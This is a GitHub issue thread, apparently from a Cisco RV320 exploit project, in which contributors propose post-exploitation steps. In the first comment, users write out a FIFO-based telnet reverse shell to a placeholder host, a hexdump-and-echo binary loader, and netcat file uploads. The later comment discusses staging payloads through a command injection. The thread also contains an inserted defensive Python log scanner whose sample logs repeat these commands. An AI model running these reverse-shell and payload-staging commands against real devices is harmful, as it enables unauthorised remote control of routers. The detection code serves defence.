
Reverse shell command

Open · BigNerd95 opened this issue 6 years ago · 1 comment

Reverse shell

What about a command like this to implement the reverse shell?

/bin/mknod /ram/f p; /bin/telnet x.x.x.x 1337 < /ram/f | /bin/bash > /ram/f 2>&1

Maybe replacing telnet with nc as used here https://github.com/BigNerd95/Chimay-Red#reverse-shell

Upload files

Then to upload a more complete busybox you can use a command like this (in combination with reverse shell)

wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips
hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /ram/busybox\n"' busybox-mips | sed -e "s/\\\\\\\\x  //g" | nc -l -q 0 -p 1337

as used here: https://github.com/BigNerd95/Chimay-Red#upload-binaries

This will split the busybox into chunks of 1024 bytes and write them as octal numbers with the echo command. Example: (image)

Or I think you can also upload files using nc directly. On PC:

nc -l -q 0 -p 1337 < busybox-mips

On device:

nc x.x.x.x 1337 > /ram/busybox-mips

(I don't have a Cisco so I cannot try, sorry)

BigNerd95 · Jan 31 '19 00:01
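From the defender's side, the three command shapes discussed in the post above (a FIFO-backed reverse shell, hexdump/echo chunks appended to a file, and a raw netcat download into a file) are easy to pick out of shell or process-audit logs once you know what they look like. The following scanner is an added example, not code from this issue or from the CiscoRV320Dump project; the log layout (`timestamp host sh: <command>`), the host name and the IP addresses are constructed placeholders.

```python
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    line_no: int
    command: str


# Constructed sample audit log; "ts host sh: <command>" layout and IPs are placeholders.
# The first three lines mirror the command patterns quoted in the issue above.
SAMPLE_LOG = r"""2019-02-08T09:02:11 rv320 sh: /bin/mknod /ram/f p; /bin/telnet 192.0.2.10 1337 < /ram/f | /bin/bash > /ram/f 2>&1
2019-02-08T09:02:12 rv320 sh: echo -e -n \x7F\x45\x4C\x46\x01\x02 >> /ram/busybox
2019-02-08T09:02:13 rv320 sh: nc 192.0.2.10 1337 > /ram/busybox-mips
2019-02-08T09:03:00 rv320 sh: ls -la /ram
2019-02-08T09:03:05 rv320 sh: echo -n hello >> /ram/note.txt
"""

# Rule 1: a FIFO is created (mknod <path> p / mkfifo <path>) and the same path is used
# as both stdin and stdout of a network client that is piped into a shell.
_FIFO_CREATE = re.compile(r"\b(?:mknod\s+(?P<p1>\S+)\s+p\b|mkfifo\s+(?P<p2>\S+))")
_NET_CLIENT = re.compile(r"\b(?:telnet|nc|ncat|netcat)\b")
_SHELL_IN_PIPE = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:sh|bash|ash|dash)\b")

# Rule 2: echo with escape interpretation writing a run of \xHH (or \\xHH) bytes into a file,
# i.e. the output shape of the hexdump loader; four or more escapes in one command is flagged.
_HEX_ECHO = re.compile(
    r"\becho\s+(?:-[en]+\s+)+((?:\\\\?x[0-9A-Fa-f]{2}){4,})\s*>>?\s*(\S+)"
)

# Rule 3: a netcat client (not a listener) with stdout redirected straight into a file.
_NC_DOWNLOAD = re.compile(r"\b(?:nc|ncat|netcat)\s+(?!-l)\S+\s+\d{1,5}\s*>\s*(\S+)")


def is_fifo_reverse_shell(cmd: str) -> bool:
    """True when a FIFO is created and then wired between a network client and a shell."""
    m = _FIFO_CREATE.search(cmd)
    if not m:
        return False
    path = m.group("p1") or m.group("p2")
    reads = re.search(r"<\s*" + re.escape(path) + r"\b", cmd)
    writes = re.search(r">\s*" + re.escape(path) + r"\b", cmd)
    return bool(reads and writes and _NET_CLIENT.search(cmd) and _SHELL_IN_PIPE.search(cmd))


def is_hex_echo_staging(cmd: str) -> bool:
    """True when echo -e/-n appends a run of hex escapes to a file (chunked binary staging)."""
    return _HEX_ECHO.search(cmd) is not None


def is_nc_file_download(cmd: str) -> bool:
    """True when a netcat client connection is redirected into a file."""
    return _NC_DOWNLOAD.search(cmd) is not None


RULES = (
    ("fifo_reverse_shell", is_fifo_reverse_shell),
    ("hex_echo_staging", is_hex_echo_staging),
    ("nc_file_download", is_nc_file_download),
)


def scan(log_text: str) -> list[Finding]:
    """Run every rule over each logged command and collect the matches."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        # Drop the "ts host sh: " prefix (assumed layout); keep the command itself.
        cmd = line.split(": ", 1)[-1]
        for name, check in RULES:
            if check(cmd):
                findings.append(Finding(name, n, cmd))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.command}")
```

The FIFO rule is deliberately stricter than "mknod appeared": it requires the created path to be both an input and an output redirection in the same command and a shell in the pipeline, which keeps ordinary FIFO use out of the alert stream. The netcat listener form (`nc -l`) is excluded from rule 3 because on the device side it is the client form that pulls a file in.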

I had some issues using netcat (from the command injection) to stage binaries (it was writing the first 1 KB and then exiting), and it seemed to me that using echo over the command injection would take too long (in other exploits where I do this it takes ~5 mins to stage the "tsh" payload I usually used). Maybe having the echo loader stage a small binary that calls out and downloads a full payload...

Will revisit it though, would be nice to have a fully working reverse shell instead of spawning telnetd :)

0x27 · Feb 08 '19 09:02